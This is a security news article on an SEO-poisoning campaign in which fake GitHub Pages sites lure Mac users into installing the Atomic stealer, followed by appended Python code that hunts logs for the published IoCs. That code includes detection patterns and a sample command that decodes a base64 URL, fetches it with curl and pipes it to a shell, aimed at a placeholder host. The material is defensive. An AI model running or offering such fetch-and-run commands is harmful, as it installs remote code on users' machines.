Macs go phishing as GitHub impostors drop Atomic stealer

In an active, large-scale campaign, attackers are posing as legitimate brands on GitHub Pages to target macOS users with the data-skimming “Atomic” stealer.

According to recent findings from LastPass, which itself was targeted in the campaign, attackers are using SEO tricks to push malicious pages to the top of Bing and Google search results, luring users into thinking they’re installing genuine software.

“This campaign appears to be targeting a range of companies, including tech companies, financial institutions, password managers, and more,” LastPass said in a blog post, adding a list of targeted companies. “In the case of LastPass, the fraudulent repositories redirected potential victims to a repository that downloads the Atomic infostealer malware.”

LastPass said that as soon as the fraudulent GitHub sites were spotted, takedown requests were filed, and the pages are now inactive.

Attack combines SEO poisoning with phishing

Using a classic SEO trick, the attackers registered GitHub Pages sites (GitHub Pages lets developers, or anyone with a GitHub account, turn a repository into a live website for free) under names designed to match a company name plus “Mac” or “macOS” terminology, boosting their rankings in search results.

Once users click these links, they are routed through a series of redirections: first to a GitHub Pages impersonation, then to a secondary site (e.g., macprograms-pro.com) that instructs the user to paste a shell command into the Mac’s Terminal. This command executes a curl request to a base64-encoded URL, which resolves to a script that downloads and runs the “Update” payload, the Atomic stealer itself.

According to LastPass, splitting the chain into multiple redirections and leveraging legitimate platforms for initial hosting is done for evasion. “Notably, the GitHub pages appear to be created by multiple GitHub usernames to get around takedowns,” the widely used password manager added.

While the fake GitHub sites have been taken down, LastPass warns that the campaign is ongoing and could still pose a significant threat to macOS users.

Macs in the crosshairs

This isn’t the first time adversaries have used search results to deliver the Atomic (AMOS) stealer. Earlier this month, a separate campaign used Google Ads to distribute the malware, which cleverly activated only on systems running x64 or ARM processors.

The Apple ecosystem, prized for its wide adoption and closed design, has seen growing attention from cybercriminals. Earlier this year, Huntress uncovered a suspected nation-state campaign planting modular, persistent malware on macOS. Another round of attacks leveraged Google Meet click-fix lures to push AMOS to Mac users.

Adding to Apple’s woes is a steady churn of zero-day flaws. Last week, the Cupertino giant patched its eighth zero-day of 2025, outpacing the six patched in 2024, though still below the 20 logged in 2023. Each new flaw widens the attack surface for opportunistic and targeted campaigns alike.

LastPass released a list of Indicators of Compromise (IoCs), including URLs such as github[.]com/lastpass-on-macbook, github[.]com/LastPass-on-MacBook/lastpass-premium-mac-download, and ahoastock825[.]github[.]io/.github/lastpass, along with the SHA256 hash of the Atomic payload.

These IoCs offer a starting place for security teams to scan logs, block access, or hunt for compromise.
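As an added illustration of the hunting side described above (example code, not from the article or from LastPass), the Python below refangs the published IoCs, scans constructed log lines for them, and flags the paste-into-Terminal pattern the article describes: a curl whose target is produced by an inline base64 decode, piped into a shell. The macprograms-pro.com domain and the github[.]com / github[.]io paths are the ones named in the article; the sample log lines and the example.invalid URL are constructed.

```python
import base64
import re

# IoCs as published in the article, in their defanged form.
DEFANGED_IOCS = [
    "github[.]com/lastpass-on-macbook",
    "github[.]com/LastPass-on-MacBook/lastpass-premium-mac-download",
    "ahoastock825[.]github[.]io/.github/lastpass",
    "macprograms-pro.com",
]

def refang(ioc: str) -> str:
    """Turn a defanged indicator ('[.]') back into a matchable, lower-cased string."""
    return ioc.replace("[.]", ".").lower()

IOCS = [refang(i) for i in DEFANGED_IOCS]

# Heuristic for the paste-into-Terminal step: curl + inline base64 decode + pipe to a shell.
CURL = re.compile(r"\bcurl\b")
B64_DECODE = re.compile(r"base64\s+(-d|--decode|-D)\b")   # macOS base64 accepts -D/--decode
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z)?sh\b")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def decoded_urls(command: str) -> list[str]:
    """Decode base64 blobs found in the command; return those that decode to a URL."""
    urls = []
    for blob in B64_BLOB.findall(command):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls

def is_suspicious_command(command: str) -> bool:
    """True when all three parts of the described chain appear in one command line."""
    return bool(CURL.search(command) and B64_DECODE.search(command) and PIPE_TO_SHELL.search(command))

def ioc_hits(line: str) -> list[str]:
    """Return every known IoC that appears in a log line (case-insensitive)."""
    low = line.lower()
    return [i for i in IOCS if i in low]

def triage(lines):
    """Scan log lines and return (line, reasons) for each line that matched."""
    findings = []
    for line in lines:
        reasons = [f"ioc:{h}" for h in ioc_hits(line)]
        if is_suspicious_command(line):
            reasons.append("curl-base64-pipe-to-shell")
            reasons += [f"decoded-url:{u}" for u in decoded_urls(line)]
        if reasons:
            findings.append((line, reasons))
    return findings

# Constructed sample input: a proxy hit on a published IoC, a shell-history entry in the
# described shape (pointing at a placeholder host), and a benign proxy line.
SAMPLE_B64 = base64.b64encode(b"https://example.invalid/update.sh").decode()
SAMPLE_LOG = [
    "proxy 10.0.0.5 GET https://ahoastock825.github.io/.github/lastpass 200",
    f"shell-history user1: echo {SAMPLE_B64} | base64 -d | xargs curl -fsSL | sh",
    "proxy 10.0.0.7 GET https://github.com/octocat/Hello-World 200",
]
```

Running `triage(SAMPLE_LOG)` returns two findings: the IoC hit and the decoded curl chain; the benign line is not reported.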
